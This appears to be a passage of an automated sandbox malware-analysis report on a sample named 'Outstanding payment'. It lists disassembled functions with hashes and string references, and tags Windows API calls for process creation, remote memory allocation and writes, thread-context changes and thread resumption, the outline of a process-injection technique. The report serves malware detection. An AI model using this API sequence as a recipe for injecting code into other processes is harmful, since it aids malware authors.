Instruction ID: ce17c3d19d9a1f47d660fc10579b0e53bfef419eaabd5d9ed5261afc9c3517bd
Opcode Fuzzy Hash: ba1ec496bda8fa4f1a48ea88f8a6c04145bf7833e6f2e7fa625c9d4b5ae43a46
Instruction Fuzzy Hash: 92B13AB4E1120ADFCB04DFA9D5858AEFBF2FF89310F10846AD516AB364D7349A01CB61

Function 0B2F5640 Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

5{, xrefs: 0B2F582A

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: 5{
API String ID: 0-2291050889
Opcode ID: 4a8b775d507a65116d6c50591d09451da1e1f2da47ece7f12b04572b20166d19
Instruction ID: b617f65c62be5614e52ac001b804e9d7fef80e4383924352d2c1522e32570482
Opcode Fuzzy Hash: 4a8b775d507a65116d6c50591d09451da1e1f2da47ece7f12b04572b20166d19
Instruction Fuzzy Hash: 09A12AB4E1160ADFCB04DFA9D5858AEFBF2FF89310F10846AD516AB364D7349A01CB61

Function 0109CE8F Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

<, xrefs: 0109CFF3

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3335183489
Opcode ID: 47b0164fd29a6c769d2222f85e8166bc639de13eddd545ef1274034472101afc
Instruction ID: c235ed9bf417007bcfa688253aae6075f2c7b3517ef864e9bcd4fbab11d25c6e
Opcode Fuzzy Hash: 47b0164fd29a6c769d2222f85e8166bc639de13eddd545ef1274034472101afc
Instruction Fuzzy Hash: 05B1C374E04219CFDB44DFA9D99499EBBF2FF89300F20856AD419AB364DB349902CF50

Function 0109CED3 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

<, xrefs: 0109CFF3

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3335183489
Opcode ID: 7f4dc03fe91aeba665a904a36e34e1d55953ce30efebec433c8da3bf2a0f869e
Instruction ID: a7cd797b01594e8c4e657dc8830f0187c3f32adea39fafcdeff75be2013559fd
Opcode Fuzzy Hash: 7f4dc03fe91aeba665a904a36e34e1d55953ce30efebec433c8da3bf2a0f869e
Instruction Fuzzy Hash: FAB1B274E00219DFDB58DFA9D99499EBBF2FF88300F20856AD419AB364DB349902CF50

Function 010991C4 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

<, xrefs: 0109CFF3

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-3335183489
Opcode ID: 96e5388c69aadc36e1a8aeab14fb7ea0fe36cfada2221b801edaf1dfa7e223eb
Instruction ID: 3ad28b46cb9b40c9d3fd27bf27a6dbd37268bad0f2ca59658e6835ef83300a69
Opcode Fuzzy Hash: 96e5388c69aadc36e1a8aeab14fb7ea0fe36cfada2221b801edaf1dfa7e223eb
Instruction Fuzzy Hash: 31B1C374E04219CFDB48DFA9D99499EBBF2FF88300F20856AD419AB364DB349901CF50

Function 0B2F70D8 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0B2F72FE

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: 0eb938385d7ca7f5c1f98307d9c8c7361fbfd0d6320c3569843e3a6b1e7ff49d
Instruction ID: 4be99e7f490263e5eb566a59dcb08de96f61eb9b33dbadbeec7bd60901cc06be
Opcode Fuzzy Hash: 0eb938385d7ca7f5c1f98307d9c8c7361fbfd0d6320c3569843e3a6b1e7ff49d
Instruction Fuzzy Hash: EE812771D2520AEFCF08CFA6D58099EFBB2EF89350F10943AE525AB224D7749945CF50

Function 0B2F70E8 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

j4$y, xrefs: 0B2F72FE

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: j4$y
API String ID: 0-2391584009
Opcode ID: 9c7a47f1af4d8d6d7a1bcdf05e946c88c035f411f6e87e99fe8583804b4eef8a
Instruction ID: ef6a887e8e92c7ef265d154179241d1abe8ab59054734065f5948c1627f92898
Opcode Fuzzy Hash: 9c7a47f1af4d8d6d7a1bcdf05e946c88c035f411f6e87e99fe8583804b4eef8a
Instruction Fuzzy Hash: AE81F570D2520EEFCF08CFA6D58099EFBB2EB89350F10943AE525AB264D7749946CF50

Function 0B2F19B1 Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B2F1931

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: 713b69135c021193cf0910cce2aceb257a4fe6808c1955f18242b2c4d39e52e5
Instruction ID: 5c344715e38eb14cd73e143cbdd46c267a0ad6a298117ce420a911c68150ae19
Opcode Fuzzy Hash: 713b69135c021193cf0910cce2aceb257a4fe6808c1955f18242b2c4d39e52e5
Instruction Fuzzy Hash: 4151D3B4E1420ADFCB44CFAAC5819AEFBF2EF89301F5084AAD515A7314D7349A51CB91

Function 0B2F3589 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

?H,a, xrefs: 0B2F35CF

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: 519eaa7ea5dc120b540bcaedfeb78f0d6739d3129515702a6ce918f7bc1537e0
Instruction ID: 9033ded007b5542484d8ae12e397f7a73dd630518016ed7049ec66dadda0f021
Opcode Fuzzy Hash: 519eaa7ea5dc120b540bcaedfeb78f0d6739d3129515702a6ce918f7bc1537e0
Instruction Fuzzy Hash: 4C413874E2420ADFDB04CFA9D581A9EFBF2FF89200F14D5A6D515AB264D730DA01CB44

Function 010925C1 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

FMQ:, xrefs: 01092678

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID: FMQ:
API String ID: 0-2195026889
Opcode ID: 8fc7c2d7fc9f0171d82d96709de714b7a5d27ce874f2ccf860a3e93e48f23626
Instruction ID: 0f944838a9556e39bc7f546fb2756b5782f490ae5237b526f34d48a7d8ff4b97
Opcode Fuzzy Hash: 8fc7c2d7fc9f0171d82d96709de714b7a5d27ce874f2ccf860a3e93e48f23626
Instruction Fuzzy Hash: 1C21FBB1E016188BDB18CFABD8502DEBBF3AFC9310F14C16AD408AA264DB351946CF50

Function 0109C39B Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab3cbe68aa94e8082d7eddacee49fad4b0b413b4c38e4fb648c191d1fcc80c3d
Instruction ID: 127f244eb98101fb8c4c8ff6795f52f65af0c714429b229a850bb1e13b54877c
Opcode Fuzzy Hash: ab3cbe68aa94e8082d7eddacee49fad4b0b413b4c38e4fb648c191d1fcc80c3d
Instruction Fuzzy Hash: C7914E74E15119CFDB14CF69D680AAEFBF2BF88300F2481A9D448AB355DB309A41DF51

Function 0B2F5A71 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83223de866cc8084fdc10f95a5e5164cd91bb375889d969d3c6110ac3f1e56f6
Instruction ID: 28809829f6aaa1c0bfb235294bf28d8447383753f0096369239c1d525a9a1beb
Opcode Fuzzy Hash: 83223de866cc8084fdc10f95a5e5164cd91bb375889d969d3c6110ac3f1e56f6
Instruction Fuzzy Hash: 1A5147B0E1120A9FCB08CFA5D8894EEFBB2FF89201F14D86AD515E7254D7389A01CF51

Function 0B2F5A80 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515777879c4467d963c2c190a099929c1883521d0b218ec3829b9fa4c3711ca9
Instruction ID: 40129d3307ec72661ae90844fe5d112fc4d27965a21ec8f0f29d3a86641153eb
Opcode Fuzzy Hash: 515777879c4467d963c2c190a099929c1883521d0b218ec3829b9fa4c3711ca9
Instruction Fuzzy Hash: B95137B0E1120ADFCB08CFA5D8894AEFBB2FF89201F14D52AD526E7254D7389A11CF50

Function 01091C08 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e2f965ef577c0fcd8a7906c9e5139ddec60b376f49c1ebd664c4cdb2ad6827
Instruction ID: 435e5b001b59daeda5dee1e400e1c95e08a8388c6f45b1eeedc14f4da4a75203
Opcode Fuzzy Hash: 92e2f965ef577c0fcd8a7906c9e5139ddec60b376f49c1ebd664c4cdb2ad6827
Instruction Fuzzy Hash: 6A5126B4E0560ACFCB08CFAAC4946AEBBF2EF88310F14D06AD455A7265D7349A41CF94

Function 0B2F16D1 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1e18dc9fb60e266022ccb72bcf48e0fdd1ad22ee0d46406be44fd775d66aec
Instruction ID: 50ac5b2b7990589f2cd11fdf855e569ca536e3db31914bf05538586dac7fce49
Opcode Fuzzy Hash: 5d1e18dc9fb60e266022ccb72bcf48e0fdd1ad22ee0d46406be44fd775d66aec
Instruction Fuzzy Hash: 484137B4D1420ACFDB08CFAAD9806AEFBF2AF88301F54D06AD519B7255D7349A41CB64

Function 0B2F16E0 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b0d7ee1f7958b728cc75cc8e154813c5b82065689edd728e6567ca75887bd1
Instruction ID: 007b76d0f3fee597b154811be79fd15fed0b3e106751618d2dc345beadc00fd4
Opcode Fuzzy Hash: a5b0d7ee1f7958b728cc75cc8e154813c5b82065689edd728e6567ca75887bd1
Instruction Fuzzy Hash: C94117B0D1420ACFDB08CFAAD5806AEFBF2FB88311F54D06AD519B7254D7349951CB54

Function 0B2FB6F8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ff5c9b27c4c707ca9b830b941bdaafa13d63ee29eeca6925da8bafd803479ad
Instruction ID: 9aef597b63eae5116c22e3081e597390550ced71f2d59b49fd21a0b6dc3be36f
Opcode Fuzzy Hash: 0ff5c9b27c4c707ca9b830b941bdaafa13d63ee29eeca6925da8bafd803479ad
Instruction Fuzzy Hash: BC412575E2920A8FDB04CFAAC4886EEFBF6AB8D301F14D07AD519A3251D7785941CF50

Function 0B2F2098 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c282c45077b91bc88fb1480f34bfb76317dcf9b9f8197eabb15bcfad25ac6d5d
Instruction ID: f4115f4395cdaaf9c7235fb636d6d55b099a5836b1e7e39a1eb43d137619ad6d
Opcode Fuzzy Hash: c282c45077b91bc88fb1480f34bfb76317dcf9b9f8197eabb15bcfad25ac6d5d
Instruction Fuzzy Hash: 9031F271E11218CFDB18CFAAD98469EBBB3AFC9311F14C0BAE409A6354DB355A85CF40

Function 0B2F0040 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b0ba388c2127ed8a333207cf9dda0eda1c35354b1558402fd1ac2fe324b309
Instruction ID: 138e02cce36642d5c8c99b0893769c9f7f518b500bb6e6a6944bc59e217c63d2
Opcode Fuzzy Hash: 17b0ba388c2127ed8a333207cf9dda0eda1c35354b1558402fd1ac2fe324b309
Instruction Fuzzy Hash: C721B971E106199BEB58CFABD84479EFBF7AFC8200F04C1BAD518A6264EB341A458F51

Function 0B2F2089 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723055e72cd19b08018c600c9ec3e71044d1b501e1587c9900c8d2cd0cb08e29
Instruction ID: 70a6181c1ddedf16869c17300385f1820beb4af5dc93c5e868f3cab706518d28
Opcode Fuzzy Hash: 723055e72cd19b08018c600c9ec3e71044d1b501e1587c9900c8d2cd0cb08e29
Instruction Fuzzy Hash: DA2109B1E116488BDB18CFABD8442DEBFF7AFC9310F14C17AD408AB259DA341985CB51

Function 09BD555B Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee4cf528bd32fad7600f25a1bf50c377019aee60637b08a29215356efae61ce9
Instruction ID: eb060781cffd2a06ac92d4c1a14a6895e30c7a7d22ec5607104da0fecebffd3b
Opcode Fuzzy Hash: ee4cf528bd32fad7600f25a1bf50c377019aee60637b08a29215356efae61ce9
Instruction Fuzzy Hash: BDA0010089F058849824189408886F4C4AD824B3B1A8176C0E11E624AA74A88012011D

Function 0B2FE834 Relevance: 2.6, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z.]\, xrefs: 0B2FE909
Z.]\, xrefs: 0B2FE966

Memory Dump Source

Source File: 00000000.00000002.2119784756.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2f0000_Outstanding payment.jbxd

Similarity

API ID:
String ID: Z.]\$Z.]\
API String ID: 0-455990519
Opcode ID: b97c458069b076f6e085f4f7d6fe5e5fe9db8cfbb1d1eaf497e2756e79b64db5
Instruction ID: 20d86ddb80165d2aca18c3c49311c725bdba5ba2c62da74ce93af156af7ca360
Opcode Fuzzy Hash: b97c458069b076f6e085f4f7d6fe5e5fe9db8cfbb1d1eaf497e2756e79b64db5
Instruction Fuzzy Hash: F5219A34A04209CFD714DF64D855BACBBBAFF88720F1081A8D52E97B19EA344E86CF11

Function 09BD17C4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09BD1A06

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bc0a7114507a08336e0e1376007a5b36c067876b564a218a5b3cdbdb6f03f728
Instruction ID: 3f1167b69ecca96ddd6750b75351c56876e7f4d8dd73bf1b46ac050682f589e6
Opcode Fuzzy Hash: bc0a7114507a08336e0e1376007a5b36c067876b564a218a5b3cdbdb6f03f728
Instruction Fuzzy Hash: 7FA17F71D0561ACFEB28CF68C8417EDBBB2FF48314F1481A9E819A7240E7759985CF91

Function 09BD17D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09BD1A06

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 870323fd3fc048751bc2af9ec74d8dd6606830d8ee92d2c933aa19f27b0d4a4f
Instruction ID: 52e5605b7572e9559e7f78f5d06db079203ff6e7d1e84945270e66fe4d5b6cad
Opcode Fuzzy Hash: 870323fd3fc048751bc2af9ec74d8dd6606830d8ee92d2c933aa19f27b0d4a4f
Instruction Fuzzy Hash: C0916E71D0561ACFEB14CF68C8417EDBBB2FF48324F1481A9E818A7240E7759985CF91

Function 01099D10 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0109B1D1

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6cf1a7c135d2a14c3148d5caa4a3c35997ce999329616657416e282238879616
Instruction ID: 5519cf9e77d8d520882c9460b6b83d58ca748a1753e8b46027eb83a2ab321c64
Opcode Fuzzy Hash: 6cf1a7c135d2a14c3148d5caa4a3c35997ce999329616657416e282238879616
Instruction Fuzzy Hash: 09411EB0C0061DCBDB24DFA9C854B9EBBF5FF49304F20806AD408AB254DB75694ACF90

Function 0109B115 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0109B1D1

Memory Dump Source

Source File: 00000000.00000002.2111035589.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_Outstanding payment.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cb563e5d2f8b5f658b8fd798f44b650a2c31a04fee60bcb3c6471de88e1cab73
Instruction ID: 4ac9945a5b8dbdb979740e2c9fe2be462162f30b0e90da527689799f4f2ffb08
Opcode Fuzzy Hash: cb563e5d2f8b5f658b8fd798f44b650a2c31a04fee60bcb3c6471de88e1cab73
Instruction Fuzzy Hash: 8A41FFB0C00619CEDB24DFA9D854B9DBBF1BF49314F20806AD408AB254DB75694ACF50

Function 09BD1140 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09BD11D8

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bb36fb1e6292d5bcf60c7fab1c00efafb6befa897db7037798678fa8ca85bf4c
Instruction ID: fe87b9d256912e32d24cc33c1173abfec92e5a76573dfd5cb450e9e973e05ee4
Opcode Fuzzy Hash: bb36fb1e6292d5bcf60c7fab1c00efafb6befa897db7037798678fa8ca85bf4c
Instruction Fuzzy Hash: 642126B59013499FCB14DFA9C885BEEBFF5FF48310F10842AE919A7250D7789945CBA0

Function 09BD1148 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09BD11D8

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 32d3c95f9bf2d100ca07149a60aba833b4a6898830938b162d90b094d143209c
Instruction ID: 99ef47d498bf13cb3ef984bc6284a4b4f4ac35f103be4e1753197d3bca1a0721
Opcode Fuzzy Hash: 32d3c95f9bf2d100ca07149a60aba833b4a6898830938b162d90b094d143209c
Instruction Fuzzy Hash: ED213B719013499FCB14DFA9C845BEEBBF5FF48310F108429E919A7240D7789545CBA1

Function 09BD1630 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09BD16B8

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 158b893bad4597c0d3aaff4b86b0b90a5fd7b7a2689dfbfb7a07493363ce9841
Instruction ID: a294b3c857636440ef70b020d1519a26fb915b47cf9fb1c3bddbde15971f0958
Opcode Fuzzy Hash: 158b893bad4597c0d3aaff4b86b0b90a5fd7b7a2689dfbfb7a07493363ce9841
Instruction Fuzzy Hash: 582128B1D003499FCB14DFA9C985AEEFBF5FF48310F10842AE519A7250D7399945CBA1

Function 09BD0B78 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09BD0BF6

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 38df4ddb0b8c1010877aefd1032353c68cb58eab46006fcbd98156f040902357
Instruction ID: bbe31638699c89df877a3420e38992c9d8646435e0e24a295256f17b3db8fa2f
Opcode Fuzzy Hash: 38df4ddb0b8c1010877aefd1032353c68cb58eab46006fcbd98156f040902357
Instruction Fuzzy Hash: F62115B1D002098FDB10DFAAC4857EEFBF4EF48324F54842AD559A7241DB78A945CFA1

Function 09BD0B71 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 09BD0BF6

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1363df9070b6ac645203f1156d41ebd0f4837d6d58d151ae6957586bbb90d2ac
Instruction ID: 15e8d83cd34f9a82008d5c2e7f5c07a6cc24634c7a87a806303194b2092ae418
Opcode Fuzzy Hash: 1363df9070b6ac645203f1156d41ebd0f4837d6d58d151ae6957586bbb90d2ac
Instruction Fuzzy Hash: CC2135B1D002098FDB10DFAAC5857EEBBF5EF88324F14C42AD459A7240DB789945CFA1

Function 09BD1638 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09BD16B8

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 36a425616ddada2ecb5ba3ba31d8647290837267392a9c5a2e8e7143f840f660
Instruction ID: a09c3ad673c8a53d5485c01f0ed37af16878071d239c236eb2a449ce44f3d5db
Opcode Fuzzy Hash: 36a425616ddada2ecb5ba3ba31d8647290837267392a9c5a2e8e7143f840f660
Instruction Fuzzy Hash: CE213AB1C003499FCB10DFAAC840AEEFBF5FF48320F508429E519A7250D7389545CBA1

Function 09BD1080 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09BD10F6

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f156941fe4a2e7e92fe976d9a547eb9cbbe213ba3113621a31f679d5d5084c2f
Instruction ID: b898c55019d50d98e11d8fa5494d3e1fc16aa5d4aa2e80a7c20264ef1ed24019
Opcode Fuzzy Hash: f156941fe4a2e7e92fe976d9a547eb9cbbe213ba3113621a31f679d5d5084c2f
Instruction Fuzzy Hash: 2E1159759002499FCB14DFA9C845AEEFFF5EF88320F10841AE519A7250C7399944CFA0

Function 09BD1088 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09BD10F6

Memory Dump Source

Source File: 00000000.00000002.2119388638.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9bd0000_Outstanding payment.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bd8711d23f026208ab56d4afbce596399f3c27d099415db0da816b2cc4f9efaa
Instruction ID: 75c38533906fee59c3f5dedcbabb58df1f5adb366b9263e1e2b46f7684084878
Opcode Fuzzy Hash: bd8711d23f026208ab56d4afbce596399f3c27d099415db0da816b2cc4f9efaa
Instruction Fuzzy Hash: 601137759002499FCB10DFAAC845AEEFFF5EF48320F108419E519A7250C779A544CFA1

Function 09BD0AC0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(EC8B5509), ref: 09BD0B2A

Memory Dump Source

